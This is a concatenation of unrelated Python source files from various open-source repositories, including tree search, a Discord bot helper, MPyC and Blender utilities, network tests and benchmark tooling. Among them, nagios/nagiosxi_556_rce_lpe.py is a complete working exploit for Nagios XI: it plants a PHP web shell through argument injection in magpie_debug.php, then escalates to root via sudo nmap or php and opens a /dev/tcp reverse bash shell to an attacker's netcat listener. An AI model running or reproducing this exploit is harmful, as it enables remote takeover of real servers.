return ((1.0 - amaf_weight) * action_result_max +
amaf_weight * amaf_action_result_max +
sqrt(2.0 * log(node.visit_count) / action_visit_count))
else:
return float('inf')
def select_action(self, state):
available_actions = list()
# Filter out actions leading to blocked nodes
for action in self.env.get_available_actions(state):
next_state = self.env.get_next_state(state, action)
next_state_key = self.env.get_key(next_state)
if (next_state_key not in self.nodes or
not self.nodes[next_state_key].blocked):
available_actions.append(action)
if available_actions:
try:
# Follow tree policy
node = self.nodes[self.env.get_key(state)]
return max(available_actions,
key=lambda action: self.uct_score(node, action))
except KeyError:
# State was not visited yet, follow default policy
if self.default_policy is not None:
return self.default_policy(state, available_actions)
else:
return random.choice(available_actions)
else:
return None
def update_node(self, node, actions_after, result):
node.visit_count += 1
node.result_sum += result
node.result_max = max(node.result_max, result)
node.action_visit_counts[actions_after[0]] += 1
node.action_result_sums[actions_after[0]] += result
node.action_result_maxes[actions_after[0]] = \
max(node.action_result_maxes[actions_after[0]], result)
# Update AMAF values (once for each unique action)
for action in set(actions_after):
node.amaf_action_visit_counts[action] += 1
node.amaf_action_result_sums[action] += result
node.amaf_action_result_maxes[action] = \
max(node.amaf_action_result_maxes[action], result)
def run_iteration(self):
result = None
while result is None:
# Selection phase
states = [self.env.initial_state]
actions = []
action = self.select_action(states[-1])
while action is not None and self.env.get_key(states[-1]) in self.nodes:
states.append(self.env.get_next_state(states[-1], action))
actions.append(action)
action = self.select_action(states[-1])
# Expansion phase
last_state_key = self.env.get_key(states[-1])
if last_state_key in self.nodes:
last_node = self.nodes[last_state_key]
else:
last_node = TreeNode(states[-1])
self.nodes[last_state_key] = last_node
# Simulation phase
for try_count in range(self.max_tries):
sim_states = states.copy()
sim_actions = actions.copy()
action = self.select_action(sim_states[-1])
while action is not None:
sim_states.append(self.env.get_next_state(sim_states[-1], action))
sim_actions.append(action)
action = self.select_action(sim_states[-1])
result = self.env.get_result(sim_states[-1])
if result is not None:
# Result is valid
break
if result is None:
# No valid simulation after max_tries tries, block the last node
# Next loop iteration will select a different node
last_node.blocked = True
print("Blocked node:", [self.env.rules.index(rule) for rule in last_node.state[1]])
# Backpropagation phase
for i, state in enumerate(sim_states[:-1]):
actions_after = sim_actions[i:]
try:
node = self.nodes[self.env.get_key(state)]
self.update_node(node, actions_after, result)
except KeyError:
pass
return sim_states, sim_actions, result
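
# --- Hedged usage sketch (not part of the original file): the search expects an
# --- environment object exposing initial_state, rules, get_key(state),
# --- get_available_actions(state), get_next_state(state, action) and
# --- get_result(state) (returning None while a design is incomplete).
# search = TreeSearch(env, max_tries=10)
# for _ in range(100):
#     states, actions, result = search.run_iteration()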
|
helpers/json_manager.py | xxopcode90xx/DiscordChatBotProject | 491 | 12748030 |
import json
def add_user_to_blacklist(user_id: int):
with open("blacklist.json", "r+") as file:
file_data = json.load(file)
file_data["ids"].append(user_id)
with open("blacklist.json", "w") as file:
file.seek(0)
json.dump(file_data, file, indent=4)
def remove_user_from_blacklist(user_id: int):
with open("blacklist.json", "r") as file:
file_data = json.load(file)
file_data["ids"].remove(user_id)
with open("blacklist.json", "w") as file:
file.seek(0)
json.dump(file_data, file, indent=4)
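
# Hedged usage sketch (assumes a blacklist.json file shaped like {"ids": []} in the working directory):
# add_user_to_blacklist(123456789012345678)
# remove_user_from_blacklist(123456789012345678)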
|
demos/sort.py | bahmanahmadi/mpyc | 232 | 12748049 |
"""Demo oblivious sorting in MPyC, with full secrecy.
Randomly generated secret-shared lists of numbers (integers or fixed-point numbers)
are sorted using MPyC's built-in functions mpc.sorted() and seclist.sort(),
which are the secure counterparts of Python's built-in function sorted() and
list.sort(), respectively.
"""
import sys
from mpyc.runtime import mpc
from mpyc.seclists import seclist
async def main():
if sys.argv[1:]:
n = int(sys.argv[1])
else:
n = 5
print('Setting input to default =', n)
s = [(-1)**i * (i + n//2)**2 for i in range(n)]
secnum = mpc.SecInt()
print('Using secure integers:', secnum)
x = list(map(secnum, s))
async with mpc:
mpc.random.shuffle(secnum, x) # secret in-place random shuffle
print('Randomly shuffled input:', await mpc.output(x))
x = mpc.sorted(x, key=lambda a: a**2) # sort on absolute value
print('Sorted by absolute value:', await mpc.output(x))
secnum = mpc.SecFxp()
print('Using secure fixed-point numbers:', secnum)
x = list(map(secnum, s))
async with mpc:
mpc.random.shuffle(secnum, x) # secret in-place random shuffle
print('Randomly shuffled input:', await mpc.output(x))
x = seclist(x)
x.sort(reverse=True) # in-place sort in descending order
print('Sorted by descending value:', await mpc.output(list(x)))
if __name__ == '__main__':
mpc.run(main())
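
# Hedged usage note: "python sort.py 16" sorts 16 values in a single local run;
# MPyC's standard command-line options also allow multi-party runs, e.g.
# "python sort.py 16 -M3" to spawn three local parties.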
|
examples/host_external_norestart.py | virtualgod/python-sc2 | 621 | 12748051 | import argparse
import sys
import asyncio
import sc2
from sc2 import Race
from sc2.player import Bot
from zerg.zerg_rush import ZergRushBot
def main():
portconfig = sc2.portconfig.Portconfig()
print(portconfig.as_json)
player_config = [
Bot(Race.Zerg, ZergRushBot()),
Bot(Race.Zerg, None)
]
for g in sc2.main._host_game_iter(
sc2.maps.get("Abyssal Reef LE"),
player_config,
realtime=False,
portconfig=portconfig
):
print(g)
if __name__ == "__main__":
main()
|
bpycv/physic_utils.py | TheShadow29/bpycv | 248 | 12748067 |
#!/usr/bin/env python3
import bpy
import mathutils
from .object_utils import activate_obj
SET_ORIGIN_HOOK_NAME = "set_back_origin"
OLD_V0_KEY = "old_object.data.vertices[0].co"
def set_origin_and_record_old_v0(obj, type="ORIGIN_CENTER_OF_VOLUME", center="MEDIAN"):
obj[OLD_V0_KEY] = obj.data.vertices[0].co.copy()
with activate_obj(obj):
bpy.ops.object.origin_set(type=type, center=center)
def set_origin_by_vector(obj, new_origin_vector):
return set_origin_by_point(
obj, obj.matrix_world.to_translation() + new_origin_vector
)
def set_origin_by_point(obj, point):
"""
Not work when bpy.context.scene.frame_curren != 1
"""
cursor_mat = bpy.context.scene.cursor.matrix.copy()
bpy.context.scene.cursor.rotation_euler = 0, 0, 0
bpy.context.scene.cursor.location = point
with activate_obj(obj):
bpy.ops.object.origin_set(type="ORIGIN_CURSOR", center="MEDIAN")
bpy.context.scene.cursor.matrix = cursor_mat
return obj
if __name__ == "__main__":
pass
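
# --- Hedged usage sketch (only meaningful inside Blender, where bpy is available):
# obj = bpy.context.active_object
# set_origin_and_record_old_v0(obj)                         # move origin to center of volume
# set_origin_by_vector(obj, mathutils.Vector((0, 0, 0.1)))  # shift origin up by 0.1 on Z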
|
android_env/components/adb_log_stream.py | yjaeseok/android_env | 768 | 12748096 | # coding=utf-8
# Copyright 2021 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class for a stream of logs output by a locally running emulator."""
import subprocess
from typing import List
from android_env.components import log_stream
_LOGCAT_COMMAND = ['logcat', '-v', 'epoch']
class AdbLogStream(log_stream.LogStream):
"""Manages adb logcat process for a locally running emulator."""
def __init__(self, adb_command_prefix: List[str], *args, **kwargs):
super().__init__(*args, **kwargs)
self._adb_command_prefix = adb_command_prefix
def _get_stream_output(self):
cmd = self._adb_command_prefix + _LOGCAT_COMMAND + self._filters
self._adb_subprocess = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1,
universal_newlines=True)
return self._adb_subprocess.stdout
def stop_stream(self):
self._adb_subprocess.kill()
|
src/pretix/plugins/statistics/signals.py | fabm3n/pretix | 1,248 | 12748109 |
#
# This file is part of pretix (Community Edition).
#
# Copyright (C) 2014-2020 <NAME> and contributors
# Copyright (C) 2020-2021 rami.io GmbH and contributors
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation in version 3 of the License.
#
# ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are
# applicable granting you additional permissions and placing additional restrictions on your usage of this software.
# Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive
# this file, see <https://pretix.eu/about/en/license>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <https://www.gnu.org/licenses/>.
#
from django.dispatch import receiver
from django.urls import resolve, reverse
from django.utils.translation import gettext_lazy as _
from pretix.base.signals import order_paid, order_placed
from pretix.control.signals import nav_event
@receiver(nav_event, dispatch_uid="statistics_nav")
def control_nav_import(sender, request=None, **kwargs):
url = resolve(request.path_info)
if not request.user.has_event_permission(request.organizer, request.event, 'can_view_orders', request=request):
return []
return [
{
'label': _('Statistics'),
'url': reverse('plugins:statistics:index', kwargs={
'event': request.event.slug,
'organizer': request.event.organizer.slug,
}),
'parent': reverse('control:event.orders', kwargs={
'event': request.event.slug,
'organizer': request.event.organizer.slug,
}),
'active': (url.namespace == 'plugins:statistics'),
'icon': 'bar-chart',
}
]
def clear_cache(sender, *args, **kwargs):
cache = sender.cache
cache.delete('statistics_obd_data')
cache.delete('statistics_obp_data')
cache.delete('statistics_rev_data')
order_placed.connect(clear_cache)
order_paid.connect(clear_cache)
|
asv/commands/rm.py | jaimergp/asv | 476 | 12748115 | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
from fnmatch import fnmatchcase
import sys
from . import Command
from .. import console
from ..console import log
from ..results import iter_results
from . import util
class Rm(Command):
@classmethod
def setup_arguments(cls, subparsers):
parser = subparsers.add_parser(
"rm", help="Remove results from the database",
description="""
Removes entries from the results database.
""")
parser.add_argument(
'patterns', nargs='+',
help="""Pattern(s) to match, each of the form X=Y. X may
be one of "benchmark", "commit_hash", "python" or any of
the machine or environment params. Y is a case-sensitive
glob pattern.""")
parser.add_argument(
"-y", action="store_true",
help="""Don't prompt for confirmation.""")
parser.set_defaults(func=cls.run_from_args)
return parser
@classmethod
def run_from_conf_args(cls, conf, args):
return cls.run(conf, args.patterns, args.y)
@classmethod
def run(cls, conf, patterns, y=True):
global_patterns = {}
single_benchmark = None
files_to_remove = set()
count = 0
for pattern in patterns:
parts = pattern.split('=', 1)
if len(parts) != 2:
raise util.UserError("Invalid pattern '{0}'".format(pattern))
if parts[0] == 'benchmark':
if single_benchmark is not None:
raise util.UserError("'benchmark' appears more than once")
single_benchmark = parts[1]
else:
if parts[0] in global_patterns:
raise util.UserError(
"'{0}' appears more than once".format(parts[0]))
global_patterns[parts[0]] = parts[1]
for result in iter_results(conf.results_dir):
found = True
for key, val in six.iteritems(global_patterns):
if key == 'commit_hash':
if not util.hash_equal(result.commit_hash, val):
found = False
break
elif key == 'python':
if not fnmatchcase(result.env.python, val):
found = False
break
else:
if not fnmatchcase(result.params.get(key), val):
found = False
break
if not found:
continue
if single_benchmark is not None:
found = False
for benchmark in list(result.get_all_result_keys()):
if fnmatchcase(benchmark, single_benchmark):
count += 1
files_to_remove.add(result)
result.remove_result(benchmark)
else:
files_to_remove.add(result)
if single_benchmark is not None:
log.info("Removing {0} benchmarks in {1} files".format(
count, len(files_to_remove)))
else:
log.info("Removing {0} files".format(len(files_to_remove)))
if not y:
do = console.get_answer_default("Perform operations", "n")
if len(do) and do.lower()[0] != 'y':
sys.exit(0)
if single_benchmark is not None:
for result in files_to_remove:
result.save(conf.results_dir)
else:
for result in files_to_remove:
result.rm(conf.results_dir)
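
# Hedged usage examples for this subcommand (pattern syntax is the "X=Y" form parsed above;
# the benchmark name, hash and Python version are illustrative):
#   asv rm "benchmark=time_*"
#   asv rm commit_hash=a1b2c3d python=3.8 -y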
|
ansible/roles/test/files/ptftests/vlan_test.py | shubav/sonic-mgmt | 132 | 12748133 |
import ast
import json
import logging
import subprocess
from collections import defaultdict
from ipaddress import ip_address, ip_network
import ptf
import ptf.packet as scapy
import ptf.dataplane as dataplane
from ptf import config
from ptf.base_tests import BaseTest
from ptf.testutils import *
from ptf.mask import Mask
class VlanTest(BaseTest):
def __init__(self):
BaseTest.__init__(self)
self.test_params = test_params_get()
#--------------------------------------------------------------------------
def log(self, message):
logging.info(message)
#--------------------------------------------------------------------------
def shell(self, cmds):
sp = subprocess.Popen(cmds, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = sp.communicate()
rc = sp.returncode
return stdout, stderr, rc
#--------------------------------------------------------------------------
def setUp(self):
self.vlan_ports_list = ast.literal_eval(self.test_params["vlan_ports_list"])
self.vlan_intf_list = ast.literal_eval(self.test_params["vlan_intf_list"])
self.router_mac = self.test_params["router_mac"]
for vlan_port in self.vlan_ports_list:
vlan_port["pvid"] = int(vlan_port["pvid"])
vlan_port["port_index"] = int(vlan_port["port_index"])
self.dataplane = ptf.dataplane_instance
self.test_params = test_params_get()
self.log("Create VLAN intf")
for vlan_port in self.vlan_ports_list:
for permit_vlanid in vlan_port["permit_vlanid"].keys():
if int(permit_vlanid) != vlan_port["pvid"]:
self.shell(["ip", "link", "add", "link", "eth%d"%vlan_port["port_index"],
"name", "eth%d.%s"%(vlan_port["port_index"], permit_vlanid),
"type", "vlan", "id", str(permit_vlanid)])
self.shell(["ip", "link", "set",
"eth%d.%s"%(vlan_port["port_index"], permit_vlanid), "up"])
self.setUpArpResponder()
self.log("Start arp_responder")
self.shell(["supervisorctl", "start", "arp_responder"])
logging.info("VLAN test starting ...")
pass
#--------------------------------------------------------------------------
def setUpArpResponder(self):
vlan_ports_list = self.vlan_ports_list
d = defaultdict(list)
for vlan_port in vlan_ports_list:
for permit_vlanid in vlan_port["permit_vlanid"].keys():
if int(permit_vlanid) == vlan_port["pvid"]:
iface = "eth%d" % vlan_port["port_index"]
else:
iface = "eth%d.%s" % (vlan_port["port_index"], permit_vlanid)
d[iface].append(vlan_port["permit_vlanid"][str(permit_vlanid)]["peer_ip"])
with open('/tmp/from_t1.json', 'w') as file:
json.dump(d, file)
#--------------------------------------------------------------------------
def tearDown(self):
logging.info("VLAN test ending ...")
self.log("Stop arp_responder")
self.shell(["supervisorctl", "stop", "arp_responder"])
self.log("Delete VLAN intf")
for vlan_port in self.vlan_ports_list:
for permit_vlanid in vlan_port["permit_vlanid"].keys():
if int(permit_vlanid) != vlan_port["pvid"]:
self.shell(["ip", "link", "delete", "eth%d.%d"%(vlan_port["port_index"], int(permit_vlanid))])
pass
#--------------------------------------------------------------------------
def build_icmp_packet(self, vlan_id,
src_mac="00:22:00:00:00:02", dst_mac="ff:ff:ff:ff:ff:ff",
src_ip="192.168.0.1", dst_ip="192.168.0.2", ttl=64):
pkt = simple_icmp_packet(pktlen=100 if vlan_id == 0 else 104,
eth_dst=dst_mac,
eth_src=src_mac,
dl_vlan_enable=False if vlan_id == 0 else True,
vlan_vid=vlan_id,
vlan_pcp=0,
ip_src=src_ip,
ip_dst=dst_ip,
ip_ttl=ttl)
return pkt
#--------------------------------------------------------------------------
def verify_icmp_packets(self, vlan_port, vlan_id):
untagged_dst_ports = []
tagged_dst_ports = []
untagged_pkts = []
tagged_pkts = []
untagged_pkt = self.build_icmp_packet(0)
tagged_pkt = self.build_icmp_packet(vlan_id)
for port in self.vlan_ports_list:
if vlan_port["port_index"] == port["port_index"]:
# Skip src port
continue
if port["pvid"] == vlan_id:
untagged_dst_ports.append(port["port_index"])
untagged_pkts.append(untagged_pkt)
elif vlan_id in map(int, port["permit_vlanid"].keys()):
tagged_dst_ports.append(port["port_index"])
tagged_pkts.append(tagged_pkt)
self.log("Verify untagged packets from ports " + str(untagged_dst_ports) + " tagged packets from ports " + str(tagged_dst_ports))
verify_each_packet_on_each_port(self, untagged_pkts+tagged_pkts, untagged_dst_ports+tagged_dst_ports)
#--------------------------------------------------------------------------
def verify_icmp_packets_from_specified_port(self, port_id, vlan_id, src_mac, dst_mac, src_ip, dst_ip, ttl):
self.log("Verify packet from port " + str(port_id))
pkt = self.build_icmp_packet(vlan_id, src_mac, dst_mac, src_ip, dst_ip, ttl)
verify_packet(self, pkt, port_id)
#--------------------------------------------------------------------------
def runTest(self):
vlan_ports_list = self.vlan_ports_list
vlan_intf_list = self.vlan_intf_list
# Test case #1
self.log("Test case #1 starting ...")
# Send untagged packets from each port.
# Verify packets egress without tag from ports whose PVID same with ingress port
# Verify packets egress with tag from ports who include VLAN ID but PVID different from ingress port.
for vlan_port in vlan_ports_list:
pkt = self.build_icmp_packet(0)
self.log("Send untagged packet from {} ...".format(str(vlan_port["port_index"])))
self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
send(self, vlan_port["port_index"], pkt)
self.verify_icmp_packets(vlan_port, vlan_port["pvid"])
# Test case #2
self.log("Test case #2 starting ...")
# Send tagged packets from each port.
# Verify packets egress without tag from ports whose PVID same with ingress port
# Verify packets egress with tag from ports who include VLAN ID but PVID different from ingress port.
for vlan_port in vlan_ports_list:
for permit_vlanid in map(int, vlan_port["permit_vlanid"].keys()):
pkt = self.build_icmp_packet(permit_vlanid)
self.log("Send tagged({}) packet from {} ...".format(permit_vlanid, str(vlan_port["port_index"])))
self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
send(self, vlan_port["port_index"], pkt)
self.verify_icmp_packets(vlan_port, permit_vlanid)
# Test case #3
# Send packets with invalid VLAN ID
# Verify no port can receive these pacekts
self.log("Test case #3 starting ...")
invalid_tagged_pkt = self.build_icmp_packet(4095)
masked_invalid_tagged_pkt = Mask(invalid_tagged_pkt)
masked_invalid_tagged_pkt.set_do_not_care_scapy(scapy.Dot1Q, "vlan")
for vlan_port in vlan_ports_list:
src_port = vlan_port["port_index"]
dst_ports = [port["port_index"] for port in vlan_ports_list
if port != vlan_port ]
self.log("Send invalid tagged packet " + " from " + str(src_port) + "...")
self.log(invalid_tagged_pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
send(self, src_port, invalid_tagged_pkt)
self.log("Check on " + str(dst_ports) + "...")
verify_no_packet_any(self, masked_invalid_tagged_pkt, dst_ports)
# Test case #4
# Send packets over VLAN interfaces.
# Verify packets can be receive on the egress port.
self.log("Test case #4 starting ...")
target_list = []
for vlan_port in vlan_ports_list:
for vlan_id in vlan_port["permit_vlanid"].keys():
item = {"vlan_id": int(vlan_id), "port_index": vlan_port["port_index"],
"peer_ip": vlan_port["permit_vlanid"][vlan_id]["peer_ip"],
"remote_ip": vlan_port["permit_vlanid"][vlan_id]["remote_ip"],
"pvid": vlan_port["pvid"]}
target_list.append(item)
for vlan_port in vlan_ports_list:
src_port = vlan_port["port_index"]
src_mac = self.dataplane.get_mac(0, src_port)
dst_mac = self.router_mac
for vlan_id in map(int, vlan_port["permit_vlanid"].keys()):
# Test for for directly-connected routing
src_ip = vlan_port["permit_vlanid"][str(vlan_id)]["peer_ip"]
for target in target_list:
if vlan_id == target["vlan_id"]:
# Skip same VLAN forwarding
continue
pkt = self.build_icmp_packet(vlan_id if vlan_id != vlan_port["pvid"] else 0,
src_mac, dst_mac, src_ip, target["peer_ip"])
send(self, src_port, pkt)
self.log("Send {} packet from {} ...".format("untagged" if vlan_id == 0 else "tagged(%d)"%vlan_id, src_port))
self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
self.verify_icmp_packets_from_specified_port(target["port_index"],
target["vlan_id"] if target["vlan_id"] != target["pvid"] else 0,
dst_mac, self.dataplane.get_mac(0, target["port_index"]),
src_ip, target["peer_ip"], 63)
# Test for for indirectly-connected routing
src_ip = vlan_port["permit_vlanid"][str(vlan_id)]["remote_ip"]
for target in target_list:
if vlan_id == target["vlan_id"]:
# Skip same VLAN forwarding
continue
pkt = self.build_icmp_packet(vlan_id if vlan_id != vlan_port["pvid"] else 0,
src_mac, dst_mac, src_ip, target["remote_ip"])
self.log("Send {} packet from {} ...".format("untagged" if vlan_id == 0 else "tagged(%d)"%vlan_id, src_port))
self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
send(self, src_port, pkt)
self.verify_icmp_packets_from_specified_port(target["port_index"],
target["vlan_id"] if target["vlan_id"] != target["pvid"] else 0,
dst_mac, self.dataplane.get_mac(0, target["port_index"]),
src_ip, target["remote_ip"], 63)
# Test case #5
# Send ICMP packets to VLAN interfaces.
# Verify ICMP reply packets can be received from ingress port.
self.log("Test case #5 starting ...")
for vlan_port in vlan_ports_list:
src_port = vlan_port["port_index"]
src_mac = self.dataplane.get_mac(0, src_port)
dst_mac = self.router_mac
for vlan_id in map(int, vlan_port["permit_vlanid"].keys()):
src_ip = vlan_port["permit_vlanid"][str(vlan_id)]["peer_ip"]
for vlan_intf in vlan_intf_list:
if int(vlan_intf["vlan_id"]) != vlan_id:
continue
dst_ip = vlan_intf["ip"].split("/")[0]
pkt = self.build_icmp_packet(vlan_id if vlan_id != vlan_port["pvid"] else 0,
src_mac, dst_mac, src_ip, dst_ip)
self.log("Send {} packet from {} ...".format("untagged" if vlan_id == 0 else "tagged(%d)"%vlan_id, src_port))
self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
send(self, src_port, pkt)
exp_pkt = simple_icmp_packet(eth_src=self.router_mac,
eth_dst=src_mac,
dl_vlan_enable=True if vlan_id != vlan_port["pvid"] else False,
vlan_vid=vlan_id if vlan_id != vlan_port["pvid"] else 0,
vlan_pcp=0,
ip_dst=src_ip,
ip_src=dst_ip,
icmp_type=0,
icmp_code=0)
masked_exp_pkt = Mask(exp_pkt)
masked_exp_pkt.set_do_not_care_scapy(scapy.IP, "id")
verify_packets(self, masked_exp_pkt, list(str(src_port)))
self.log("Verify packet from port " + str(src_port))
#--------------------------------------------------------------------------
|
nagios/nagiosxi_556_rce_lpe.py | iamarkaj/poc | 1,007 | 12748135 | from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import SocketServer, threading, ssl
import requests, urllib
import sys, os, argparse
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# https://www.tenable.com/security/research/tra-2018-37
#
# This code exploits both CVE-2018-15708 and CVE-2018-15710 to pop root a shell.
# It has been tested against Nagios XI 2012r1.0, 5r1.0, and 5.5.6.
TIMEOUT = 5 # sec
def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)
# handle sending a get request
def http_get_quiet(url):
try:
r = requests.get(url, timeout=TIMEOUT, verify=False)
except requests.exceptions.ReadTimeout:
err_and_exit("Request to '" + url + "' timed out.")
else:
return r
# 200?
def url_ok(url):
r = http_get_quiet(url)
return (r.status_code == 200)
# run a shell command using the PHP file we uploaded
def send_shell_cmd(path, cmd):
querystr = { 'cmd' : cmd }
# e.g. http://blah/exec.php?cmd=whoami
url = path + '?' + urllib.urlencode(querystr)
return http_get_quiet(url)
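# Hedged usage sketch: exec_url below is hypothetical (it should point at the dropped
# exec.php, e.g. 'https://<target>/nagiosql/exec.php'); returns the command output text.
def _example_run_id(exec_url):
    return send_shell_cmd(exec_url, 'id').text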
# delete some files locally and on the Nagios XI instance
def clean_up(remote, paths, exec_path=None):
if remote:
for path in paths:
send_shell_cmd(exec_path, 'rm ' + path)
print 'Removing remote file ' + path
else:
for path in paths:
os.remove(path)
print 'Removing local file ' + path
# Thanks http://django-notes.blogspot.com/2012/02/generating-self-signed-ssl-certificate.html
def generate_self_signed_cert(cert_dir, cert_file, key_file):
"""Generate a SSL certificate.
If the cert_path and the key_path are present they will be overwritten.
"""
if not os.path.exists(cert_dir):
os.makedirs(cert_dir)
cert_path = os.path.join(cert_dir, cert_file)
key_path = os.path.join(cert_dir, key_file)
if os.path.exists(cert_path):
os.unlink(cert_path)
if os.path.exists(key_path):
os.unlink(key_path)
# create a key pair
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 1024)
# create a self-signed cert
cert = crypto.X509()
cert.get_subject().C = 'US'
cert.get_subject().ST = 'Lorem'
cert.get_subject().L = 'Ipsum'
cert.get_subject().O = 'Lorem'
cert.get_subject().OU = 'Ipsum'
cert.get_subject().CN = 'Unknown'
cert.set_serial_number(1000)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60)
cert.set_issuer(cert.get_subject())
cert.set_pubkey(key)
cert.sign(key, 'sha1')
with open(cert_path, 'wt') as fd:
fd.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
with open(key_path, 'wt') as fd:
fd.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
return cert_path, key_path
# HTTP request handler
class MyHTTPD(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
msg = '<?php system($_GET[\'cmd\']); ?>' # this will be written to the PHP file
self.end_headers()
self.wfile.write(str.encode(msg))
# Make the http listener operate on its own thread
class ThreadedWebHandler(object):
def __init__(self, host, port, keyfile, certfile):
self.server = SocketServer.TCPServer((host, port), MyHTTPD)
self.server.socket = ssl.wrap_socket(
self.server.socket,
keyfile=keyfile,
certfile=certfile,
server_side=True
)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
def start(self):
self.server_thread.start()
def stop(self):
self.server.shutdown()
self.server.server_close()
##### MAIN #####
desc = 'Nagios XI 5.5.6 MagpieRSS Remote Code Execution and Privilege Escalation'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Nagios XI IP Address (Required)')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
args = arg_parser.parse_args()
# Nagios XI target settings
target = { 'ip' : args.t }
# listener settings
listener = {
'ip' : args.ip,
'port' : args.port,
'ncip' : args.ncip,
'ncport': args.ncport
}
# generate self-signed cert
cert_file = 'cert.crt'
key_file = 'key.key'
generate_self_signed_cert('./', cert_file, key_file)
# start threaded listener
# thanks http://brahmlower.io/threaded-http-server.html
server = ThreadedWebHandler(listener['ip'], listener['port'], key_file, cert_file)
server.start()
print "\nListening on " + listener['ip'] + ":" + str(listener['port'])
# path to Nagios XI app
base_url = 'https://' + target['ip']
# ensure magpie_debug.php exists
magpie_url = base_url + '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
if not url_ok(magpie_url):
err_and_exit('magpie_debug.php not found.')
print '\nFound magpie_debug.php.\n'
exec_path = None # path to exec.php in URL
cleanup_paths = [] # local path on Nagios XI filesystem to clean up
# ( local fs path : url path )
paths = [
( '/usr/local/nagvis/share/', '/nagvis' ),
( '/var/www/html/nagiosql/', '/nagiosql' )
]
# inject argument to create exec.php
# try multiple directories if necessary. dir will be different based on nagios xi version
filename = 'exec.php'
for path in paths:
local_path = path[0] + filename # on fs
url = 'https://' + listener['ip'] + ':' + str(listener['port']) + '/%20-o%20' + local_path # e.g. https://192.168.1.191:8080/%20-o%20/var/www/html/nagiosql/exec.php
url = magpie_url + '?url=' + url
print 'magpie url = ' + url
r = http_get_quiet(url)
# ensure php file was created
exec_url = base_url + path[1] + '/' + filename # e.g. https://192.168.1.192/nagiosql/exec.php
if url_ok(exec_url):
exec_path = exec_url
cleanup_paths.append(local_path)
break
# otherwise, try the next path
if exec_path is None:
err_and_exit('Couldn\'t create PHP file.')
print '\n' + filename + ' written. Visit ' + exec_url + '\n'
# run a few commands to display status to user
print 'Gathering some basic info...'
cmds = [
('whoami', 'Current User'),
("cat /usr/local/nagiosxi/var/xiversion | grep full | cut -d '=' -f 2", 'Nagios XI Version')
]
for cmd in cmds:
r = send_shell_cmd(exec_url, cmd[0])
sys.stdout.write('\t' + cmd[1] + ' => ' + r.text)
# candidates for privilege escalation
# depends on Nagios XI version
rev_bash_shell = '/bin/bash -i >& /dev/tcp/' + listener['ncip'] + '/' + str(listener['ncport']) + ' 0>&1'
# tuple contains (shell command, cleanup path)
priv_esc_list = [
("echo 'os.execute(\"" + rev_bash_shell + "\")' > /var/tmp/shell.nse && sudo nmap --script /var/tmp/shell.nse", '/var/tmp/shell.nse'),
("sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`" + rev_bash_shell + "`'", None)
]
# escalate privileges and launch the connect-back shell
timed_out = False
for priv_esc in priv_esc_list:
try:
querystr = { 'cmd' : priv_esc[0] }
url = exec_path + '?' + urllib.urlencode(querystr)
r = requests.get(url, timeout=TIMEOUT, verify=False)
print '\nTrying to escalate privs with url: ' + url
except requests.exceptions.ReadTimeout:
timed_out = True
if priv_esc[1] is not None:
cleanup_paths.append(priv_esc[1])
break
if timed_out:
print 'Check for a shell!!\n'
else:
print 'Not so sure it worked...\n'
server.stop()
# clean up files we created
clean_up(True, cleanup_paths, exec_path) # remote files
clean_up(False, [cert_file, key_file])
|
pyhealth/data/expdata_generator.py | Abhinav43/PyHealth | 485 | 12748155 |
# -*- coding: utf-8 -*-
# Author: <NAME> <<EMAIL>>
# License: BSD 2 clause
import os
import csv
import pickle
import random
import numpy as np
import pandas as pd
import tqdm
from tqdm._tqdm import trange
import time
try:
from ..utils.check import *
except:
from pyhealth.utils.check import *
class imagedata:
def __init__(self, expdata_id, root_dir='.'):
"""
        experiment data generator class for image datasets
        Parameters
